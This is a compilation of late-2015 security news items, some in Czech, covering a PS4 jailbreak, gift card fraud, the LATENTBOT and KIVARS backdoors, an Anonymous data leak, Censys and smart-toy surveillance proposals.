Sony's PlayStation 4 – the hottest-selling gaming console in the United States – has been in the market for a while now, and since its release, hackers have been tinkering with it to find a way to run unauthorized software.
Though breaking the protection on PlayStation 4 is a huge deal, a hacker who calls himself CTurt has claimed to develop a fully jailbroken version of the PlayStation 4 with the help of a kernel exploit that he previously created.
The current jailbreak allows dumping of the system RAM from other processes and installing custom firmware that can be used to run homebrew applications that aren't approved by Sony.
Of course, there is still a few other security issues to get by, but it is a foot in the door for game piracy, which can affect the gaming market as a whole.
The Twitter account of CTurt seems to indicate that currently the exploit only works for PlayStation 4 firmware version 1.76, but apparently it can be tweaked to work for more recent firmware.
CTurt successfully managed to take advantage of an exploit in PlayStation 4 v1.76 to inject an external code in the system, thereby taking control of the hardware.
Sony would certainly be unhappy with the launch of PlayStation 4 jailbreak and would be trying hard to eliminate any vulnerabilities for the most recent version of PS4 firmware.

Gift cards and return merchandise fraud scheme

Be careful when using gift cards, cyber criminals have learned how to exploit this popular form of gift-giving, especially during the Holiday season.
Every day, users receive dozens of gift cards from top retailers for sale online, some of these are legitimate gift cards sold through third-party sites that resell used or unwanted cards, but a good portion result of illegal activities.

Some discounted gift cards are in fact the product of merchandise return fraud.

As explained by the security expert Brian Krebs, this kind of scam mainly impacts retailers that issue gift cards when clients return merchandise at a store without presenting a receipt.

Brian Krebs reported the case of one of his readers, who was aware that crooks steal merchandise from a physical store in the retail chain and return the merchandise to another store of the same chain without a receipt and then offer for sale the gift cards to websites like and at a discounted price.

Many stores for returns more than 60 days after the purchase, or if the receipt is unavailable, offer the value of the goods returned will be refunded to a merchandise card.

The Kreb’s reader confirmed she was not aware that the card was a merchandise return card, a fact that was printed on the front of the card she received.

gift cards

Krebs noticed searching for available gift cards for sale online discovered that the cards are routinely sold for at least 25 percent off their value.Clothier

“Clothier H&M’s cards average about 30 percent off.”

Krebs made other interesting discoveries analyzing discounts for industries that haven’t customers return (i.g. fuel stations, restaurants). The value of the cards from merchants that don’t take customer returns allows discounts that tends to be much lower, between 3 and 15 percent (i.e. gift cards from Starbucks and Chevron).

Twenty-five percent off is really high and experts invite customers to be wary of such offers.

“Normally, it is around 5 percent to 15 percent.” said Damon McCoy, an assistant professor at New York University and an expert on fraud involving stored value cards.
This means we are facing with a consolidated illegal activity, that according to the National Retail Foundation will cost U.S. retailers nearly $11 billion this year.

“Investigators say the crimes very often are tied to identity theft rings and drug addicts. Last month, authorities in Michigan convicted a 46-year-old father of four for running a large-scale fencing operation that used teams of prostitutes, heroin users, parolees and panhandlers to steal high-priced items from local Home Depot stores and then return the goods to a different Home Depot location in exchange for store debit cards.” wrote Krebs in a blog post.

Clearly gift cards are also a privileged cashout method for criminals specialized in the sale of stolen credit cards. Crooks used stolen card data to buy gift cards from a range of retailers and offer them for sale online at 20-30 percent discounts.

Is Vuvuzela the most secure SMS text messaging system?

A group of computer scientists at the Massachusetts Institute of Technology has developed the most secure SMS text messaging system.
A group of computer scientists at the Massachusetts Institute of Technology (MIT) has developed a new SMS text messaging system, dubbed Vuvuzela, that is untraceable and could allow truly anonymous communications.

The researchers explained that their SMS text messaging system is resilient to traffic analysis, so more secure than the Tor anonymity network.

“Tor operates under the assumption that there’s not a global adversary that’s paying attention to every single link in the world,” said Nickolai Zeldovich, an associate professor of computer science and engineering, and co-leader of the Parallel and Distributed Operating Systems group at CSAIL.

“Maybe these days this is not as good of an assumption. Tor also assumes that no single bad guy controls a large number of nodes in their system. We’re also now thinking, maybe there are people who can compromise half of your servers.”

Scientists from MIT and the Qatar Computing Research Institute (QCRI), in July, claimed to be able to de-anonymize Tor hidden servers with up to 88% accuracy. The researcher demonstrated how to unmask Tor hidden services in the Tor Network by analyzing the traffic patterns of encrypted data passing through a single machine in the Tor network.

The researchers demonstrated that “simply by looking for patterns in the number of packets passing in each direction through a guard, machine-learning algorithms could, with 99 percent accuracy, determine whether the circuit was an ordinary Web-browsing circuit, an introduction-point circuit or a rendezvous-point circuit.”

“Furthermore, by using a Tor-enabled computer to connect to a range of different hidden services, they showed that a similar analysis of traffic patterns could identify those services with 88 per cent accuracy. That means that an adversary who lucked into the position of guard for a computer hosting a hidden service, could, with 88 per cent certainty, identify it as the service’s host.” States the MIT’s full press release .”

In October, the researchers presented their paper, titled “Vuvuzela: Scalable Private Messaging Resistant to Traffic Analysis” at the Association for Computing Machinery Symposium on Operating Systems Principles.

“Vuvuzela is a new scalable messaging system that offers strong privacy guarantees, hiding both message data and metadata. Vuvuzela is secure against adversaries that observe and tamper with all network traffic, and that control all nodes except for one server” states the paper.

A user that needs to send a message to another user leaves it at a specific location, such as a memory address on an internet-connected dead drop server, then its interlocutor retrieves the message from the same location.

In the simplest scenario were three people using the system but only two of them were sending text messages to each other, an attacker that analyze the traffic to the server is able to track the two users that exchanged messages.

To avoid traffic analysis in this scenario, the users, even not involved in any communication, send out regular messages to the dead-drop server making ineffective traffic analysis.

In this case, a persistent attacker running a traffic analysis will be only able to see traffic going through the server from multiple locations at all times.

The researchers explained that sending out regular spoof messages is not enough to avoid traffic analysis due to the possibility that an attacker can infiltrate the dead-drop server. In this case, the attacker would be able to see which users were actually sending out messages and who is its interlocutor.

To make the Vuvuzela resilient to this kind of attack, the SMS text messaging system uses three different dead drop servers.

Vuvuzela SMS text messaging system 2

All the messages, real and fake, are sent through the system wrapped in three layers of encryption.

” To make sure that exchange requests get mixed, each client encrypts their request with the public key of each server. If there are three servers, with public keys pk1, pk2, and pk3, then a user encrypts their request r to form Epk1 (Epk2 (Epk3 (r))). 5 This onion construction ensures that the request r can be decrypted only if each server removes its encryption layer in turn” states the paper.

The first server peels off the first layer of encryption on a message and then forward it to the second server. The first server also mixes up the order of the messages, and the second server does the same, so the third server is the unique one that can read the real messages.

The three layers of encryption allow the Vuvuzela SMS text messaging system to be effective even if one of the server is compromised.

Cyber Terrorists Can Get Their Hands on UK Infrastructure, Like the Net or Electricity

Cyber terrorists can target UK infrastructure, with the odds being in favor of targeting the power grid, rather than the Internet broadband network.
Cyber terrorists are probably going to target the UK and more specifically focus on something that will create chaos in the country. After the devastating incidents of Paris in November, many people fear that ISIS and other extremist attackers will not rest. Instead, they will keep on escalating things and spreading terror all over the world. As far as the United Kingdom is concerned, some claim that the Internet broadband network will be an easy target. However, when it comes to escalating and causing severe damage, the electric grid would be far more catastrophic!

Of course, the net would die even in the case of turning off the lights all over the country. Furthermore, cyber terrorists can carry out a successful attack against the power grid jeopardizing human lives. This is what the extremists are after, right? So, it makes total sense that the electric power would be a more suitable target for them. Either way, the attacks would demand well-planned strategies and perfect coordination.

cyber terrorists vs uk power grid

James Blessing is the Chair of the Internet Service Providers Association (ISPA) and has commented on the possibility of cyber criminals to target the UK network. He said that there are multiple locations to target and these locations have been created to be kept impenetrable:

“These places are not unsecure, they are in highly-guarded locations that as a network engineer are a pain to get into. They are in high security buildings and there’s usually a perimeter fence that is well away from the building. You would have to have a seriously big truckful, you’re talking a load of fertiliser bigger than the IRA used to use.”
On the targeting issue, Mr. Hypponen is a Chief Research Officer at cyber security specialists F-Secure and has analyzed his point of view:

“The Islamic State has demonstrated that they have the most credible offensive cyber capability of any of the jihadist extremist movements, and even they are far away from having this level of operational skills in their disposal … Why bother toying around taking down the net if you could take down the electric grid?”
An example of resilience in the governmental infrastructure that ought to be taken into consideration is that of Estonia. Ever since 2007, the whole governmental infrastructure can immediately bounce to international servers and thus jeopardize any of the data. So, without being physically located in one place, people have managed to eliminate the risks of being targeted at a specific place.

In the light of such a growing need for protection online, Britain has announced £1.9bn funding within a period of five years to safeguard the country against cyber-attacks, as well as the creation of a National Cyber Centre in the coming year, 2016.

European Space Agency domains hacked by Anonymous

The collective Anonymous has compromised the subdomains of the European Space Agency website and leaked personal information of thousands of subscribers and officials.
The hacking collective Anonymous seems to be very active in this period, its last victim is the European Space Agency. Members of Anonymous have breached a number of subdomains of the European Space Agency website and leaked personal and login credentials of thousands of subscribers and officials.

”We did it for the Lulz” is the message left by Anonymous.

Anonymous hacked European Space Agency

Anonymous conducted a cyber attack on the following subdomains of the European Space Agency (ESA) website:
The hackers exploited a blind SQL vulnerability in order to access the backend of the subdomains and exfiltrate data from the database.

The colleagues at the who disclosed the news, have analyzed the data leaked online by Anonymous confirming its authenticity. Anonymous leaked the stolen data into three separate files which include the website’s database, officials personal information and Subscribers’ data.

“The third file contains names, emails and clear-text passwords of 8000+ subscribers. The leaked data is available here → Database | Officials’ data |Subscribers’ data.”

Anonymous reported to HackRead the following message:


It seems that the branch of the Anonymous collective that hacked the European Space Agency is the same that breached the databases at United Nations Climate Conference (Cop21) and the World Trade Organization.

Such kind of incidents opens the doors to further cyber attacks, the leaked data include information related to officials that could be targeted by criminal groups or nation-state actors for espionage.

Torrent websites infected 12 million Internet users per month

According to a new study conducted by researchers at Digital Citizens Alliance and RiskIQ almost one-third of the 800 torrent websites served malware.
People believe that the best way to see a film or get a software is downloading from one of the numerous torrent websites online. Probably there is something that you should know.

According to a new study conducted by researchers at Digital Citizens Alliance and RiskIQ, almost one-third of the 800 torrent sites served malware on the users’ machine between June and August 2015.

About 12 million Internet users per month were infected by downloading material from the torrent files.

The experts cited the case of newly released video game Fallout 4 whose pirated copy was found embedded with a malicious code used by crooks to steal 4.88 bitcoins (nearly 2000 USD) from a gamer’s PC.

The researchers revealed that most torrent websites earn money by selling ads to malicious advertisers ho serve malware that criminal organizations use to harvest users’ data to resell on the black market.

According to the experts, the profit of this lucrative business allowed crooks to earn more than 70 million dollars.

“Baiting Internet users, stealing their personal information, and taking control of their computers is becoming big business—an estimated $70 million per year just from peddling malware.” states the report.

Most of the computers are infected via malicious ads spread through the torrent websites, the ads redirect victims to websites hosting malicious exploit kits.

“When you visit mainstreams sites, things are naturally happening without you clicking anything: pictures are being downloaded, ads are generating,” said Tom Galvin, executive director of Digital Citizens Alliance. “What’s happening now is that users can click on one of these content sites and decide not to watch a movie, but the malware is already on their computer scraping for their Social Security number. That’s used to mimic and adopt your online persona, access banking information, and in some cases, people are getting credit fraud notifications.”

torrent websites lucrative business

Movie hubs deliver the majority of malware as explained by Galvin.

“Movies are digital bait,” added Galvin. “Consumers are defenseless, and this is really exploiting and abusing them.”

The researchers analyzed mainstream sites like Crackle and Hulu with torrent sites who provide movies like the Pirate Bay, Kickass Torrents, ExtraTorrent, multiple Torrentz forks, Putlocker and others.

Two percent of the mainstream sites were found serving malware each month and 33 percent of sites in the Content Theft Sample group had at least one malware incident in one month.

54% of all malicious code detected was classified as Trojan, 29 percent as Adware .

torrent websites malware

The researcher detected numerous variants of Remote access Trojans (RATs) which are used by crooks to steal financial information, login credentials and even access laptop’s camera.

The study includes the Top 10 RATs identified by the researchers, some of them are well-known threats used in numerous attacks in the wild. Xtreme Rat and Bifrost lead the list.

torrent websites RATs

Unfortunately online piracy is one of the most profitable illegal activities and curbing it represent a major challenge for law enforcement.
You can give a contribute by stop download content from such websites that open you to cyber attacks and infections.

Give a look to this excellent report.

Iranian Government says Daesh doesn’t pose a threat to Iran


The Iranian Cyber police (FATA) is actively monitoring the activities of the Daesh terrorist group (ISIS) in the country.
“Live by the sword, die by the sword,” Iranian hackers are intensifying their activities against the Western countries, recently security firms have uncovered several cyber espionage campaigns targeting US and European. organizations.

In November, experts from Check Point firm published a new report on the Rocket Kitten group, revealing the intensification of the Iranian activities in the cyberspace.

But Iranian experts are aware of possible threat originating from the cyberspace, not only Western governments, but also militant of the ISIS terrorist group.

The Daesh has a credible offensive cyber capability, this is the opinion of the cyber security expert Mikko Hyppönen which worries about cyber terrorists belonging to the Islamic State (Daesh, ISIL or ISIS) have a credible offensive cyber capability.

The Daesh is also threatening the Iranian Government, last week the Iran Chief Brigadier General Kamal Hadianfar announced at a Monday press conference that Iranian FATA (The Iranian Cyber Police) has identified and admonished an individual spreading the rumor that Daesh might pose a cyber threat to Iran. Hadianfar explained that the man admitted his error, but anyway he hasn’t done anything illegal.

“Hadianfar told a press conference that the person spreading the rumor that Daesh will pose threat to Iran on December 11 has been identified. He added he is living in northern Iran.” states a report published by the Islamic Republic News Agency (IRNA).

“FATA admonished the person for the issue, he said adding the person admitted to have made mistake, but, insisted that he has not committed any crime.”

According to the Islamic Republic News Agency (IRNA), the Chief Brigadier General Kamal Hadianfar explained that the FATA is monitoring the evolution of Daesh in the country, especially the activities exploiting the technological means.

132 websites linked to the terror group ISIS had been identified and shutdown, ha confirmed that all initiatives of propaganda has been nipped in the bud.

The commander of the Islamic Revolution Guards Corps (IRGC) anyway confirmed that no serious threat has been posed by Daesh for cyber attack.

I personally consider a serious error to underestimate every cyber threat, including the ISIS cyber capabilities.

The ISIS has the ability to make fake Syrian passports


A new intelligence report shared with law enforcement warns of ISIS’ ability to create fake Syrian passports, it’s alarm.
According to a report issued by the US intelligence, the ISIS has the ability to create fake Syrian passports, the news was confirmed this week by a federal official.

The news was reported by the ABC news and the CNN, a spokeswoman for U.S. Immigration and Customs Enforcement confirmed the existence of the report but declined to provide a copy of it.

ABC News, which first reported the existence of the report on Thursday, confirmed the report was released to law enforcement by the Homeland Security Investigations agency. The US intelligence believes that the fake passports could be used by members of the ISIS organization to travel to the United States.

According to the US intelligence, members of the ISIS terrorist group have access to Syrian government passport printing machines and blank passports. This means that the organization is able to print travel documents for its members.

“The report warned that, based on U.S. Immigration and Customs Enforcement’s intelligence sources, ISIS has access to passport printing machines and blank passport books, raising the possibility the documents could be faked, according to the source.” states the CNN.

According to the CNN there was also concern that because the ISIS members had access to biographical and fingerprint data on Syrian citizens, there could expose Syrians to identity theft.

bitcoin isis 2

“The source noted that, beyond the report, there’s concern that this capability coupled with ISIS access to government buildings in Syria that contain valid biographical data and fingerprint info on Syrian citizens give rise to the threat of identity theft.” continues the CNN.

The experts don’t exclude that the fake passports have been already used by the ISIS to enter in the US.

“Since more than 17 months [have] passed since Raqqa and Deir ez–Zour fell to ISIS, it is possible that individuals from Syria with passports ‘issued’ in these ISIS-controlled cities or who had passport blanks, may have travelled to the U.S.,” states the ABC News.

The FBI Director James Comey discussed this week this issue in testimony on Capitol Hill.

“The intelligence community is concerned that they [Islamic State] have the ability, the capability to manufacture fraudulent passports, which is a concern in any setting.” said the FBI Director.

The Maine Independent Sen. Angus Kind told CNN that the US is moving toward developing a new generation of passports that cannot be faked due to the presence of a chip that has biometric data.

“I think this tells us that we’ve got to accelerate doing that. But in the world of threats, of course, this is the one of them, but there are lots of other things we have to attend to as well,” King said.

LATENTBOT, one the highly obfuscated backdoor in the wild

Experts at FireEye have discovered a stealthy botnet relying on a backdoor called LATENTBOT has compromised companies around.
Experts at FireEye have discovered a stealthy botnet relying on a backdoor called LATENTBOT has compromised companies around. According to FireEye the LATENTBOT remained undetected since 2013 infecting computers in US, UK, South Korea, Brazil, United Arab Emirates, Singapore, Canada, Peru and Poland in 2015.

“FireEye Labs recently uncovered LATENTBOT, a new, highly obfuscated BOT that has been in the wild since mid-2013. It has managed to leave hardly any traces on the Internet, is capable of watching its victims without ever being noticed, and can even corrupt a hard disk, thus making a PC useless.” states the report published by FireEye.

The experts observed multiple campaigns targeting multiple industries, but the threat actors appear to be focused on the financial services and insurance sectors.

FireEye has uncovered similar samples in the wild across the time, using passive DNS information its experts dated the bot around mid-2013.

Giving a detailed look to the LATENTBOT botnet, the experts discovered that it implements a 6-stage obfuscation process, operates completely in memory (LATENTBOT will only keep its code in memory for the short time that is needed to infect the target), and implements a single exfiltration mechanism.

Below the list of features implemented by the LATENTBOT beckdoor.
a) Multiple layers of obfuscation
b) Decrypted strings in memory are removed after being used
c) Hiding applications in a different desktop
d) MBR wiping ability
e) Ransomlock similarities such as being able to lock the desktop
f) Hidden VNC Connection
g) Modular design, allowing easy updates on victim machines
h) Stealth: Callback Traffic, APIs, Registry keys and any other indicators are decrypted dynamically
i) Drops Pony malware as a module to act as infostealer

LATENTBOT is able to scan for cryptocurrency wallets via Pony stealer 2.0 malware plugin, it uses a custom encryption algorithm to protect command and control (C2) communications.

“LATENTBOT itself is not targeted in nature – it has been observed in multiple industries – but it is selective in the types of Windows systems to infect. For example, it won’t run in Windows Vista or Server 2008. LATENBOT also uses compromised websites as CnC infrastructure, making infection easier and detection harder.”

The researchers discovered that when the bot is running on a laptop, it will query the battery status via GetSystemPowerStatus and call SetThreadExecutionState in order to prevent the system from entering in sleep mode.

The threat actors exploit emails as attack vector, they have been using malicious messages containing an old word exploit created with Microsoft Word Intruder (MWI) exploit kit. When victims opened the document an embedded malicious executable runs, contacting the C&C server for campaign tracking and download the second stage binary, which turns out to be a LuminosityLink RAT.

“During our analysis, the Word documents downloaded LuminosityLink as the second stage binary. LuminosityLink is a full-featured RAT that has the ability to steal passwords, record keystrokes, transfer files and activate attached microphones or webcams.” continues the report.

“Since the running LuminosityLink is a RAT that offers multiple capabilities to fully control the infected box, it is surprising that another payload is being downloaded from a secondary C2 at emenike[.] (,” FireEye detailed. That new module is LATENTBOT.

latentbot infection phase

The report, published by FireEye includes full details on the back door, enjoy it!

Skutečný chaos u virtuálních strojů

13.12.2015 Hrozby
Začalo to jako jednoduché zavolání na linku podpory zaměstnancem jednoho z našich hlavních vývojových center: Vypadávaly tam telefonní hovory. Brzy se vyskytly podobné stížnosti od dalších uživatelů a také od obchodníků, kteří zmiňovali, že neschopnost udržet telefonní hovory jim výrazně ztěžovala uzavírání obchodů.

Cokoliv, co ovlivňuje obrat, určitě získá něčí okamžitou pozornost. Telekomunikační tým zkontroloval nastavení naší aplikace Cisco Call Manager i VoIP brány – a vše bylo v pořádku.

Trochu překvapivý zdroj

Linka technické podpory však následně dostala i řadu stížností na příliš pomalé připojení k internetu, a to ze stejného vývojového centra. Někteří lidé se rozhodli přivolat na pomoc i bezpečnostní oddělení.

Šéf našeho oddělení pro správu sítí, který je také odpovědný za administraci firewallů, mi zaslal zprávu, která hned získala mou pozornost: „Přijď se na to raději podívat.“ Ukázal mi protokoly firewallu chránícího vývojové centrum, které byly plné odchozích spojení přes port 445 do několika míst v internetu.

Museli jsme tuto aktivitu rychle zarazit, aby se přístup k internetu a funkce telefonní služby obnovily. Náš pokus zablokovat odchozí provoz na firewallu nebyl úspěšný, protože protokoly vytížily prostředky firewallu natolik, že jsme na něm nemohli udělat vlastně vůbec nic.

Síťový inženýr tedy umístil seznam řízení přístupu na jeden ze směrovačů, což mu nakonec umožnilo upravit pravidlo zasaženého firewallu a zablokovat škodlivý provoz. Toto opatření zase zpřístupnilo internet a telefonní služby, takže se tím vyřešily bezprostřední problémy. Co je ale způsobilo? Náš inženýr měl naštěstí zálohu protokolů, takže jsme mohli data v klidu analyzovat.

Kontrola ukázala, že IP adresy generující provoz byly přidělené učebně. Lektor mi prozradil, že účastníci jednoho z kurzů instalovali bitovou kopii serveru na desktopy v učebně a na rozdíl od běžného protokolu učebny připojili virtuální stroje přímo do podnikové sítě.

Zjistili jsme, že tyto virtuální stroje neobsahovaly žádný antivirový software a nebyly záplatované více než dva roky, takže jsme spustili antivirový program a jeden z těchto virtuálních strojů zkontrolovali. A najednou bylo vše jasné.

Virtuální stroj byl infikovaný virem, jehož vlastnosti odpovídaly aktivitám, jež způsobily odepření služby. Tedy ve skutečnosti bylo nakažených všech 30 desktopů ve třídě. A to nebylo ještě to nejhorší.

Nainstalované bitové kopie vycházely ze základní bitové kopie udržované u poskytovatele cloudu, která sama obsahovala virus, což vysvětluje, jak se nakazilo všech 30 strojů.

Bez oprav

Zkontaktoval jsem osobu, která nesla odpovědnost za provisioning bitových kopií virtuálních strojů, abych zjistil, proč se nepodnikly kroky, které by takové infekci mohly zabránit. Vysvětlila, že před pár lety některé opravy způsobovaly nestabilitu bitových kopií, takže se instalace patchů zastavily.

Pokud jde o antivirový software, zmíněný člověk prohlásil, že neměl rozpočet, aby ho nainstaloval na více než 1 500 bitových kopií systému Microsoft Windows. Možná že mě mělo takové vysvětlení uklidnit, ale nedokázal jsem skrýt své zděšení.

Patnáct set bitových kopií virtuálních strojů mělo minimální nebo žádnou ochranu před virovou infekcí! A tyto bitové kopie se pravidelně používaly v několika našich odděleních v počítačích, které jsou připojené do podnikové sítě.

Okamžitě jsem požádal o schůzku našeho šéfa IT i viceprezidenty oddělení, která nasazují virtuální stroje. Žádal jsem okamžitý mandát pro skenování všech bitových kopií, instalaci našeho podnikového antivirového softwaru, instalaci všech oprav a zavedení procesu, který by zajistil shodu bitových kopií s procesem správy oprav v naší společnosti.

To vše jsem musel stihnout během jediného pracovního dne.

The French Gov will not block Tor neither Free Wi-Fi

According to the French Prime Minister Valls the Government will not ban Public Wi-Fi or the Tor Network.
Last week, documents leaked to Le Monde suggested that the French Government was planning to adopt drastic measures in response to the terrorist threat, including the ban of the Tor Network and curtail public Wi-Fi.

According to an internal document from the Ministry of Interior visioned by journalists at the French newspaper Le Monde, the French Prime Minister Manuel Valls ruled out introducing the above restrictions in response to the Paris terrorist attacks.

The document includes two proposals of legislation, one around the state of emergency, and the other related to counterterrorism measures.

The French Government was considering to “Forbid free and shared wi-fi connections,” the measures have to be adopted to avoid any abuse of public wi-fi networks. The law enforcement is difficult to track suspects and terrorists who use public wi-fi networks.

According to the legislation, the French Government was planning to give more powers to the authorities, including the enforce GPS tracking of rented cars, the block of Tor connections and the use of cellphone eavesdropping systems.

tor astoria

“Internet freedom is a great way to communicate with people, that’s a plus for the economy,” said Valls, adding it was “also a way for terrorists to communicate and spread their totalitarian ideology.” “The police look at all the aspects that better fight against terrorism, of course, but we must take effective measures,”

But Valls, clarified that the French Government will not ban the popular Tor network, neither to monitor its use. He said he had seen no proposals for such a scheme.

Anonymous Declares War On Donald Trump — #OpTrump
Anonymous Declares War On Donald Trump
After targeting the Islamic State (ISIS) group in the wake of Deadly terror attacks in Paris, hacktivist group Anonymous has now turned its attention to controversial US presidential candidate Donald Trump.
The hacktivist group has declared war against Donald Trump following his recent radical speech stating he wanted to ban Muslims from entering the United States.
Anonymous vs. Donald Trump
On Wednesday, Anonymous slams Trump by posting a YouTube video in which a man in a Guy Fawkes mask says:
"Donald Trump, it has come to our attention that you want to ban all Muslims to enter the United States. This policy is going to have a huge impact. This is what ISIS wants. The more Muslims feel sad, the more ISIS feels that they can recruit them. Donald Trump, think twice before you speak anything. You have been warned, Donald Trump."
Watch the Video:

Anonymous Takes Down Donald Trump Website
Moreover, the group started #OpTrump hacking campaign against Donald Trump on Wednesday night and took down the website for New York City's Trump Towers ( by hitting it with Distributed Denial-of-Service (DDoS) attacks.
The website was reportedly down for hours. However, it appears to be operational now.
While the online hacktivist group has yet to officially claim responsibility for the DDOS attack on Trump's website, Twitter users showed their full support to Anonymous and its #OpTrump campaign.
Also Read: Telegram Shuts Down 78 ISIS Channels
This is not the first time the group has targeted Trump. Few months ago, Anonymous broke into in an effort to deliver Jon Stewart a message as he was about to leave The Daily Show.
As we await Anonymous's next move, the group has already declared Friday to be a day to troll ISIS, urging Twitter users to troll ISIS using the #Daeshbags hashtag.
This Hack Lets You Find Which of Your Facebook Friends Like Trump
Meanwhile, a website known as has been created to show you which of your Facebook friends have "Liked" Donald J. Trump.
Clicking on the site will land you to a Facebook search feature that shows what your friends have liked, or you can achieve the same yourself by simply typing "My friends who like Donald J. Trump" in the Facebook search bar.
You will get a list of anyone in your Facebook network who has clicked "Like" on Trump's Facebook page.

UK Gov could hack children’s smart toys to Spy on suspects

The British Government as part of the Investigatory Powers Bill is planning to hack children’s smart toys to snoop on suspects.
We discussed several times the possibility to spy on people through smart device, including smart toys. A couple of weeks ago, the security expert Matt Jakubowski explained that the new Wi-Fi-Enabled Hello Barbie can be hacked to extract Wi-Fi network names, account IDs, and MP3 files from the toy.

News of the day is that as part of the Investigatory Powers Bill, children’s smart toys could be used by British law enforcement.

The "Hello Barbie" smart toys

According to Antony Walker, deputy chief executive officer of techUK, IoT devices, included smart toys, can be intercepted by the UK government and used for their investigation.

“In the context of the Internet of Things you have many types of connected devices … [such as] toys [that] children can interact [with].” Mr. Walker said at the second session on the Investigatory Powers Bill, :

“These devices may sit in a child’s bedroom, but they may be accessible. In theory, the manufacturer of the products could be subject to a warrant to enable equipment interference with those devices.”

The expert highlighted the implication of smart objects for the users’ privacy and security.

“We are moving beyond a world that is just about telephony, accessing messaging services and so on,” he stated.

“In an IOT type world the definitions that seem to apply to equipment seem to apply potentially to a huge range of devices that could be used for communications purposes and other purposes as well.”

The draft Investigatory Powers Bill would make it the legal duty of Internet service providers (ISPs) to support the law enforcement in exploiting smart devices, including smart toys, to snoop on suspects.
“A range of devices that have been in the news recently, in relation to a hack, are children’s toys that children can interact with,” Walker told the committee. “These are devices that may sit in a child’s bedroom but are accessible.”
According to the Investigatory Powers Bill, the UK Government would propose to make possible to break end-to-end encryption implemented by private companies for their services.

Větší bezplatné místo na OneDrive vám zůstane, stačí kliknout
Před měsícem Microsoft překvapil ohlášením změny týkající se bezplatné kapacity na cloudovém úložišti OneDrive. Od února se všem uživatelům sníží bezplatná kvóta z 15 GB na 5 GB, přičemž budou zrušeny i dřívější bonusy za aktivaci automatického ukládání fotek. Uživatelům se to nelíbilo, což dali Microsoftu najevo silnou zpětnou vazbou. Firma zareagovala a nabídla řešení.

Bezplatnou kapacitu na OneDrive si můžete nechat

Tím je možnost zachování současné hladiny kapacity bezplatného prostoru na OneDrive. Jediné, co je pro to nutné udělat, je kliknout sem a potvrdit, že chcete u svého účtu větší bezplatný prostor zachovat. Microsoft tak vyhoví stávajícím uživatelům, kteří o prostor navíc stojí, ale uvolní kapacity díky všem ostatním, kteří této možnosti nevyužijí.

Hacker-Friendly Search Engine that Lists Every Internet-Connected Device
Meet an all-new Hacker’s Search Engine similar to Shodan – Censys.
At the end of last month, security researchers from SEC Consult found that the lazy manufacturers of home routers and Internet of Things (IoT) devices have been re-using the same set of hard-coded cryptographic keys, leaving around 3 millions of IoT devices open to mass hijacking.
But how did the researchers get this number?
Researchers uncovered these devices with the help of Censys – a new search engine that daily scans the whole Internet for all the vulnerable devices.
Censys Maintains Complete Database of Everything on The Internet
Censys is similar to hacker's search engine Shodan, which is designed specifically to locate any devices that have been carelessly plugged into the Internet without much attempt at preventing unauthorized access.
However, Censys employs a more advanced method to find vulnerabilities in the devices and make the Internet a safer place.
Censys is a free search engine that was originally released in October by researchers from the University of Michigan and is powered by the world's biggest search engine Google.
Censys is part of an open source project that aims at maintaining a "complete database of everything on the Internet," helping researchers and companies unearth Online security mishaps and vulnerabilities in products and services.
How Does Censys Work?
Censys collects information on hosts and websites via daily scans of the IPv4 address space – the internet protocol version 4 that routes the majority of the Internet traffic today.
In order to do so, the new search engine uses two companion tools:
ZMap – an open-source network scanner
ZGrab – an application layer scanner
Censys then maintains a database of how hosts and websites are configured, allowing researchers to query the data through a search interface, report builder, and SQL engine.
ZMap scans over 4 Billion IP addresses on the Internet and collects new data every day. It also helps determine whether the machines on the internet have security vulnerabilities that should be fixed before being exploited by the hackers.
"We have found everything from ATMs and bank safes to industrial control systems for power plants. It's kind of scary," said Zakir Durumeric, the researcher leading the Censys project at the University of Michigan.
Obvious flaws in addition to issues caused by IT administrator failures can also be found.
Here's the MIT Technology Review on Censys, titled "A Search Engine for the Internet’s Dirty Secrets."
More details on the Censys architecture and functionalities are available in the team's research paper.
If you would like to give Censys a try, you can follow the step-by-step tutorial offered by the developers.

A well-funded cyber criminal group targets Asian organizations


Trend Micro announced that the Asian market are being targeted more than ever by well-funded cyber criminal group that appears very organized.
The attacks rely on the Bifrose code to develop their backdoor, a malware that has been around since 2008. In 2014 it was reported that a new version of Bifrose appeared in the wild. Among the improvements observed in the new variant of Bifrose, the use of the Tor network to hide the C&C infrastructure.

“BIFROSE is mostly known for its keylogging routines, but it is capable of stealing far more information than just keystrokes,”. States Trend Micro,

It is a known fact that the Bifrose source code was sold in the past for around $10,000. The experts believe that the cyber criminal group behind the recent attacks against Asian entities is active since 2010 and that they bought the source code of Bifrose. The group has many human and financial resources and owns a wide variety of hacking tools in its arsenal.

“Our research indicates that the group has sufficient financial resources to purchase the source code of a widely available malware tool, and the human resources to design improved versions of its own backdoors based on this,”. Said Razor Huang, Trend Micro threats analyst.

The cyber criminal group most probably bought the Bifrose source code and improved its capabilities by adding new features

“improving its functions, the group then designed a new installation flow, developed a new builder to create unique loader-backdoor pairs, and made more simple and concise backdoor capabilities, resulting in a new backdoor—KIVARS. This could mean that the operation is either backed financially by its sponsors or the group has the funds and resources to improve on an existing backdoor.” Continues TrendMicro.

It is important to refer that the KIVARS backdoor could be used to target 64-bit systems. Trend Micro explains that KIVARS is most probably linked to Bifrose because they found that “some KIVARS backdoors’ PDB (program database) paths betray the code name of KIVARS to be “BR” + “{year}”. We think that BR mostly likely stands for Bifrose RAT.”

Another malware based on Bifrose developed by the same hacking group back in 2010 is XBOW. XBOW shows the “Recent,” “Desktop,” and “Program” folder paths, which are also present in the BIFROSE and KIVARS phone home messages.

cyber criminal group backdoors

Trend Micro monitored of a recent operation conducted by the cyber criminal group, dubbed Operation Shrouded Crossbow, that focused on the Asian market and in areas such as government contractors, privatized government agencies, and companies in the financial, healthcare, computer and consumer electronics sectors

The experts believe the cyber criminal group owns separated teams for each activity, one for development, another for the infiltration/targeting part, and another one to maintain their C&C infrastructure.

In my opinion, this shows the trend of the last 3 / 4 years, where more and more groups are becoming organized, like a legit company, where they are able to generate enough funds to keep going and improving their methods.

Government Could Hack Children's Toys to Spy on You
Smartphones, Smart TVs, Smart Watches, Cell Phone Towers, Messaging services… but now, What's Next?
Smart Toys? Yes, probably.
Tech expert is warning that 'Smart Toys' could now be used by the government intelligence agencies to spy on suspects.
As part of the Investigatory Powers Bill, children's connected toys could be the next item to be used by the government in an effort to spy on people, claims Antony Walker, deputy CEO of technology trade association techUK.
The Snooper's Charter – Government's Spy Eyes
